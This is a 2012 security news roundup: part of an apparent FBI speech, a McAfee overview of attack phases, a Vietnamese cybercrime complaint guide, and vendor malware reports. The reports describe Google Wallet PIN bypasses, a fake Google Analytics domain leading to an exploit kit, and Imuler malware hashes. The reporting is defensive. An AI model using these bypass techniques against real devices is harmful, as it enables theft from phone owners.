Here at home, the National Cyber Investigative Joint Task Force brings together 18 law enforcement, military, and intelligence agencies to stop current and predict future attacks. With our partners at DHS, CIA, NSA, and the Secret Service, we are targeting cyber threats facing our nation. The task force operates through Threat Focus Cells—specialized groups of agents, officers, and analysts that are focused on particular threats, such as botnets.

Together we are making progress.

Last April, with our private sector and law enforcement partners, the FBI dismantled the Coreflood botnet. This botnet infected an estimated two million computers with malware that enabled hackers to seize control of zombie computers to steal personal and financial information.

With court approval, the FBI seized domain names and re-routed the botnet to FBI-controlled servers. The servers directed the zombie computers to stop the Coreflood software, preventing potential harm to hundreds of thousands of users.

In another case, just a few months ago, we worked with NASA’s Inspector General and our partners in Estonia, Denmark, Germany, and the Netherlands to shut down a criminal network operated by an Estonian company by the name of Rove Digital.

The investigation, called Operation Ghost Click, targeted a ring of criminals who manipulated Internet “click” advertising. They re-directed users to their own advertisements and generated more than $14 million in illegal fees. This “click” scheme impacted more than 100 countries and infected four million computers, half-a-million of which were here in the United States.

We seized and disabled computers, froze the defendants’ bank accounts, and replaced rogue servers with legitimate ones to minimize service disruptions. With our Estonian partners, we arrested and charged six Estonian nationals for their participation in the scheme.

And again, we must continue to push forward together.

Terrorism remains the FBI’s top priority. But in the not too distant future, we anticipate that the cyber threat will pose the number one threat to our country.

We need to take lessons learned from fighting terrorism and apply them to cyber crime. We will ensure that all of our special agents have the fundamental skills to operate in this cyber environment. Those agents specializing in cyber matters will have the greatest possible skill set.

We are creating a structure whereby a cyber agent in San Francisco can work in a virtual environment with an agent in Texas, an analyst in Virginia, and a forensic specialist in New York to solve a computer intrusion that emanated from Eastern Europe.

At the same time, we must rely on the traditional capabilities of the Bureau: sources and wires. We must cultivate the sources necessary to infiltrate criminal online networks, to collect the intelligence to prevent the next attack, and to topple the network from the inside. We must ensure that our ability to intercept communications—pursuant to court order—is not eroded by advances in technology. These include wireless technology and peer-to-peer networks, as well as social media.

We will also continue to enhance our collective ability to fight cyber crime.

Following the September 11th terrorist attacks, we increased the number of Joint Terrorism Task Forces. Today, we have more than 100 such task forces—with agents, state and local law enforcement officers, and military personnel—working together to prevent terrorism.

We are developing a similar model to fight cyber crime—to bolster our capabilities and to build those of state and local law enforcement as well.

Along these same lines, 12 years ago we joined forces to address both the growing volume and complexity of digital evidence. Together with our state and local partners, we created the first Regional Computer Forensics Laboratory in San Diego. Today, we have 16 such labs across the country, where we collaborate on cases ranging from child exploitation to public corruption. Together we are using technology to identify and prosecute criminals and terrorists.

Working with our partners at DHS and the National Cyber-Forensics Training Alliance, we are using intelligence to create an operational picture of the cyber threat—to identify patterns and players, to link cases and criminals.

Real-time information-sharing is essential. Much information can and should be shared with the private sector. And in turn, those of you in the private sector must have the means and the motivation to work with us.

We in the Bureau are pushing for legislation to provide for national data breach reporting. This would require companies to report significant cyber breaches to law enforcement and to consumers. Forty-seven states already require the reporting of data breaches, but they do so in different ways and to different degrees.

We must continue to break down walls and to share information, in the same way we did in the wake of the September 11th attacks. This includes the walls that sometimes exist between law enforcement and the private sector.

You here today are often the first to see new threats coming down the road. You know what data is critically important, and what could be at risk.

And while you are fierce competitors in the marketplace, you routinely collaborate behind the scenes. For example, Microsoft, Google, Facebook, and Bank of America, along with several other companies, have joined forces to design a system to authenticate legitimate e-mails and weed out fake messages.

Such collaboration is commonplace now. But 12 years ago in the “Mafiaboy” case, several of the affected companies shared their experiences and worked together—for the first time—to present a united front against that denial of service attack.

Public-private partnerships are equally important.

Through the FBI’s InfraGard program, individuals in law enforcement, government, the private sector, and academia meet to talk about how to protect our critical infrastructure. Over the past 15 years, InfraGard has grown from a single chapter in the Cleveland FBI Field Office to more than 85 chapters across the country, with more than 47,000 members.

Recently, after attending a local InfraGard meeting, one member recognized a phishing scam and notified the FBI. We identified 100 U.S. banks that had been victimized by unauthorized ATM withdrawals in Romania. Eighteen Romanian citizens were charged and eight individuals were extradited to the United States. Three have pled guilty, with one sentenced to more than four years in prison.

We in the FBI understand that you may be reluctant to report security breaches. You may believe that notifying the authorities will harm your competitive position. You may fear that news of a breach will erode shareholder confidence. Or you may think that the information flows just one way—and that is to us.

We do not want you to feel victimized a second time by an investigation. We will minimize the disruption to your business, and we will safeguard your privacy. Where necessary, we will seek protective orders to preserve trade secrets and business confidentiality. And we will share with you what we can, as quickly as we can, about the means and the methods of attack.

But maintaining a code of silence will not serve us in the long run. For it is no longer a question of “if,” but “when” and “how often.”

I am convinced that there are only two types of companies: those that have been hacked and those that will be. And even they are converging into one category: companies that have been hacked and will be hacked again.

Given that scenario, we must limit the data that can be gleaned from any compromise. We must segregate mission-centric data from routine information. And we must incorporate layers of protection and layers of access to critical information.

We may need to look at alternative architectures that are more secure...that allow critical infrastructure owners and operators to better spot threat actors and to provide information to law enforcement to track and to catch them.

Attribution is critical to deter future attacks. We cannot just minimize vulnerabilities and deal with the consequences. Collectively, we can improve cyber security and lower costs—with systems designed to catch threat actors rather than to withstand them.

Several months ago, I read William Powers’ book, “Hamlet’s BlackBerry,” about the impact of technology on civilization. In one chapter, he wrote about the Roman philosopher Seneca In the days of the Roman Empire, connectivity was on the rise—new roads, new ways of communicating, and a new postal system to handle the influx of written documents. Postal deliveries were the high point of the day. People coming from every direction would converge at the port to meet the delivery boats arriving from Egypt.

As they say, the more things change, the more they stay the same.

Today we have the so-called “BlackBerry Jam,” where several individuals—heads down, shoulders slumped, all furiously typing, talking, reading, or browsing at once—come to a head on a crowded corner. We are all guilty of this conduct.

All those years ago, Seneca argued that the more connected society becomes, the greater the chance that the individual will become a slave to that connectivity. Today, one could argue that the more connected we become, the greater the risk to all of us.

We cannot turn back the clock. We cannot undo the impact of technology. Nor would we want to.

But we must continue to build our collective capabilities to fight the cyber threat…we must share information…we must work together to safeguard our property, our privacy, our ideas, and our innovation.

We must use our connectivity to stop those who seek to do us harm.

Thank you and God bless.

[ Via combating-threats-in-the-cyber-world-outsmarting-terrorists-hackers-and-spies

[Security] The Four Phases of Every Attack

Let’s face it, threats have gotten much more complex; like complex mechanisms they use multiple, consecutive methods to attack. At McAfee, our research teams continually analyze the threat landscape, and define threats in terms of their attack mechanisms, which consistently fall into four categories. First malware needs a way to come in contact with unsuspecting users. Second, they then use a diversity of ways to enter your system and begin to write files to disk and modify your system. Third, they use several means to hide from detection before they even begin to do their dirty work of stealing personal information or scare you into buying useless security software. Its not until the fourth phase do they really start to do their unscrupulous business.

In this discussion, we will share some research showing the four phases of every malicious attack and in a follow on blog, with provide some recommendations as to how you can protect yourself and your business.
First, lets look at the first phase of how modern threats operate; How the attacker first crosses path with its victim. The most common form of first contact is via a malicious web site. The web continues to be a dangerous place for the uninformed and unprotected. Websites can become malicious on purpose or by infection and host malware, potentially unwanted programs, or phishing sites. In 2011, McAfee Labs recorded an average of 6,500 new bad sites per day; in one quarter that figure shot up to 9,300. We also noticed that about one in every 400 URLs we attempted to load were malicious; some days that number was one in every 200 URLs! Protecting users from these sites becomes essential to protection and actually offers the least expensive way to maintain a secure environment. Other important methods include physical access such as thumb drives used by Advances Persistent Threats or APT’s, unsolicited messages from social media sites, and network access from misconfigured or unsecure wireless networks.

Phase 2 is the ways the attacker gets code running first time on target machine. The vast majority of the time the code will exploit one or more of the thousands of vulnerabilities in common, legitimate applications or in the operating system itself. If the malware can take down or otherwise subvert the protections in existing software it can write its code to disk and move onto phase three.

In phase 3, the goal is to persist the malicious code on the system, so that it can survive reboot, stay hidden from security measures as well as hide itself from the user. The code can hide itself in known good processes, block access to security software updates, disable the Windows task manager, Windows Safe Mode, System Restore, the Firewall, Microsoft Security Center as well as change browser security settings. Rootkits and other advanced attacks have been particularly difficult to stop as they will many times load prior to the operating system, effectively hiding from security software

And finally in phase 4, we get to the real reason for the malware, its ‘business logic’; what the attacker wants to accomplish. This could be stealing identities, passwords, bank fraud, force the purchase Fake AntiVirus software, steal intellectual property, or sell bot network services.

In my next blog, I will discuss ways in which today’s security products can be used protect you in each of the 4 phases.

[Via http://blogs.mcafee.com]

[RAT] Hướng dẫn viết đơn tố cáo tội phạm máy tính

Khi bạn là nạn nhân của tội phạm máy tính thì bạn có thể yêu cầu cơ quan pháp luật bảo vệ.
Mẫu đơn tố cáo bạn có thể sử dụng

Chú ý:
Nên gửi trực tiếp bằng thư viết tay/ đánh máy
Về đơn
Mục 1. Về cơ quan gửi: Bạn có thể tham khảo ở post này to-giac-toi-pham.html
Mục 3. Bạn nêu rõ nội dung sự việc
Ví dụ, nếu có dấu hiệu lừa đảo, chiếm đoạt tài sản thì bạn nêu nội dung từ đầu ---> nghi ngờ, phát hiện mình bị lừa
Mục 4. Đề nghị cơ quan ..... làm rõ, trả lại tiền, tài sản.... truy tố kẻ lừa đảo
Mục 5. Là cam đoan
Ngoài ra, bạn nên gửi kèm BẢNPHOTO các tài liệu có liên quan ( Log chat, số điện thoại, nick, giấy chuyển tiền, thông tin tài khoản... v.v.)

20 March 2012

[Security] Happy Birthday IE 8

It was three years ago today (March 19, 2009) that Microsoft unleashed Internet Explorer (IE) 8. According to Microsoft, the priorities for IE 8 were security, compatibility, ease of use, web development improvements, as well as adhering to CSS specifications and other web standards.

Three years on, IE 8 is still the second most used web browser version in the world.

Via pingdom]

[Tool] Oxygen Forensic SQLite Viewer v.2.1

Oxygen Software announces Oxygen Forensic SQLite Viewer v.2.1. This version introduces data export to PDF, XLS, XLM and other formats, and the ability to export selected tables. The new version also improves conversion utilities, introduces the conversion sidebar and adds the ability to save big BLOB fields to file. All registered customers may download the new version immediately from their personal customer area.

New in Oxygen Forensic SQLite Viewer v.2.1:

* Added export to RTF, PDF, XML, XLS, СSV, TSV and HTML file formats.
* Added ability to export selected tables.
* Added ability to select multiple records on Deleted data tab.
* Data type ‘Table record’ or ‘Deleted record’ are shown when copying entries to clipboard.
* Added support for OS X Epoch format conversion.
* Added an external window to view the data.
* Added ability to save big BLOB fields in a file.
* Accelerated SQLite Viewer work.
* Improved conversion of millisecond UNIX format dates.
* Improved conversion: automatic conversion is done on the one sidebar.
* Improved support for Base64 conversion.
* General interface improvements.
* Fixed error that sometimes occurred after closing the Viewer.

[Infographic] Wordpess developers are driving

[Security] Victorian Taxi Directorate exposes 400+ email addresses

The Victorian Taxi Directorate has earned then ire of people it was trying to placate, after it put more than 400 email addresses in the “To:” field of an email it sent to ask about its complaints resolution process.

The email, sent yesterday, said “The Victorian Taxi Directorate (VTD) is committed to continually improving its customer service and complaints handling processes,” and went on to say recipients should “... be assured that your personal details have been collected and used consistent with Privacy Act 2000.”

Except for their email addresses, that is, as 432 by The Register's count were included in the “To:” field for all recipients to see. Some have hit “Reply All”, creating a merry little email storm that is pleasing nobody.

Angry recipients, including Register readers, have pointed out the situation and its absurdity.

The Directorate has quickly apologised for the mess, with Assistant Manager of Communications Bob Nelson saying it is “absolutely not” the organisation's policy to share email addresses in this way.

“It was a genuine piece of human error,” he said. “They put the addresses into the wrong field instead of cc or bcc. The person who did it is feeling very regretful.”

“We sent another email getting in touch with everyone once we knew what had happened,” Nelson added. The organisation has also 'fessed up to the Privacy Commissioner about the mess.

[ Via ]

17 March 2012

[Security] Malware OSX/Imuler OSX/Revir.A dropper

This new variant is very similar to its ancestors in terms of command-and-control (C&C ) communication and functionalities. (OSX/Imuler is an information stealer that can gather and transmit files, screenshots, and other data to a remote server.) The network protocol is still HTTP-based and the payload is compressed with zlib. The hardcoded C&C domain now being used is a new one, registered on February 13th, 2012 via a Chinese registrar. The domain points to the same IP address as the previous variants, located in the USA and still active at time of writing.

This all seems to indicate that the new variant was most likely released to improve its anti-virus evasion.

OSX/Imuler has the functionality to upload arbitrary local files to the C&C. A specialized separate executable named CurlUpload, downloaded from the C&C every time the malware starts, is used to perform the operation. This stand-alone executable, first seen in early 2011, presents interesting strings that suggest it was initially built for Win32 but later recompiled for OS X:

ESET security software (including ESET Cybersecurity for Mac) since signature update 6970 detects this new variant as OSX/Imuler.C.

MD5 of the files analyzed:

7dba3a178662e7ff904d12f260f0fff3 (Installer)
9d2462920fdaed5e360875fb0cf8274f (malicious payload))
e00a280ad29440dcaab42ad093bcaafd (uploader module)

Big thanks to my colleague Marc-Étienne M. Léveillé for his work on this investigation.

[ Via Blog Eset ]

16 March 2012

[Security] Australia lacks cash for cybercrime study

The Australian Institute of Criminology (AIC) does not have the resources to repeat its 2009 Australian Business Assessment of Computer User Security (ABACUS) study into the prevalence of cybercrime in Australia.

An AIC spokesperson told The Register that the cost and complexity involved in an ABACUS study is not something the Institute can currently contemplate, and added “It’s certainly important to keep track of the trends in this area, although nationally representative prevalence surveys of cybercrime are rarely undertaken.”

“The AIC will, if resources are available, look to undertake similar surveys to our ABACUS project that was one of the few large-scale business victimisation surveys in this area.”

The AIC's 2011 Australian crime: Facts & figures report therefore use previously-published data from AusCERT and the Australian Competition and Consumer Commission (ACCC). Both sources collected data for 2010 studies. That leaves the cyber crime section of the AIC's 2011 report reliant on aged data from a year other than that defined as the document's reporting period.

We don't think anyone needs advanced epistemological training to deduce that the report may therefore be a little light-on. ®

[ Via theregister ]

15 March 2012

[Report] Monthly Malware Statistics: February 2012

Vulnerabilities in the Google Wallet payment system

In autumn 2011, Google launched Google Wallet, an e-payment system that allows users to pay for goods and services using Android phones with Near Field Communication (NFC — contactless transactions). The Google Wallet app is installed on a smartphone and the user specifies which credit card to use. To process payments, the owner of the phone must enter a PIN in the Google Wallet app and put the phone in proximity to the scanning device. The phone will then transfer encrypted data to complete the transaction.

When Google announced this new service, data security professionals voiced some doubts about security if a phone were to be lost or stolen or otherwise fall into someone else’s hands. Then, in early February, two methods used to hack Google Wallet were detected.

At first, Joshua Rubin, an engineer at zVelo detected how a PIN can be chosen if a certain person gets access to the telephone. Bank account data is stored in a special, secured section (the Secure Element) of the NFC chip, but the PIN hash is stored on the phone’s file system. Root access is needed to read the hash, and that can be gained using well known hacker tactics. Since PIN codes are just four-digit numbers, malicious users don’t need to spend a lot of time trying combinations to get the proper sequence. Once the PIN is determined, a malicious user can purchase products using the phone owner’s Google Wallet account.

Just one day after this vulnerability was detected, new information emerged about another method for gaining access to someone’s Google Wallet account on a found or stolen phone — without even having to hack the system or obtain root access. This time a vulnerability in the Google Wallet app itself was exploited. If one uses the app properties menu and deletes all of the data pertaining to the Google Wallet app, the app will request that the user enter a new PIN code the next time it is launched, and it won’t require entry of the previous PIN.

These vulnerabilities were immediately reported to Google, which suspended Google Wallet operations for several days in order to fix the problems. Later, Google announced that the app’s vulnerabilities had been fixed and the service updated. However, on 1 March, there was still no information about any solutions for the vulnerability using a scan to determine the correct PIN. In order to prevent access to the PIN’s hash, it needs to be stored in the Secure Element just like other critical bank account and credit card data. But this is where certain legal issues come into play: in this case, the banks would be the ones responsible for PIN code security within the Secure Element, not Google.
Fake Google Analytics code redirects users to BlackHole Exploit Kit

Malicious users often hack websites in order to seed malicious programs — malicious code is planted in the hacked resource’s code. All kinds of techniques are used to prevent the owners of the compromised websites from noticing anything fishy. In early February, Kaspersky Lab followed a wave of infections involving the seeding of malicious code disguised as Google Analytics code.

The fake code has a few distinguishing features:
The malicious code uses a double-dash, unlike the real address (i.e. google--analytics.com vs. google-analytics.com).
In Google’s real code, the account ID is a unique string with numerals (e.g. UA-5902056-8) and serves as the website’s unique identification code. The malicious code uses the “UA-XXXXX-X” string instead.
The code seeded by malicious users is planted at the very start of the page’s code, even before the <html> tag, while the real Google Analytics code is typically located at the end of the page.

If a user goes to a page seeded with this code, the malicious google--analytics.com address will then download obfuscated “ga.js” javascript, and users visiting the hacked page will be taken through a number of redirects before ending up at a server hosting the BlackHole Exploit Kit. If the exploit launches successfully, the user’s computer will be infected with malware.

Currently, the fake site google--analytics.com is not operational. Some hacked websites still feature the fake Google Analytics code, but it is harmless (for now, at least).

Read more >>>>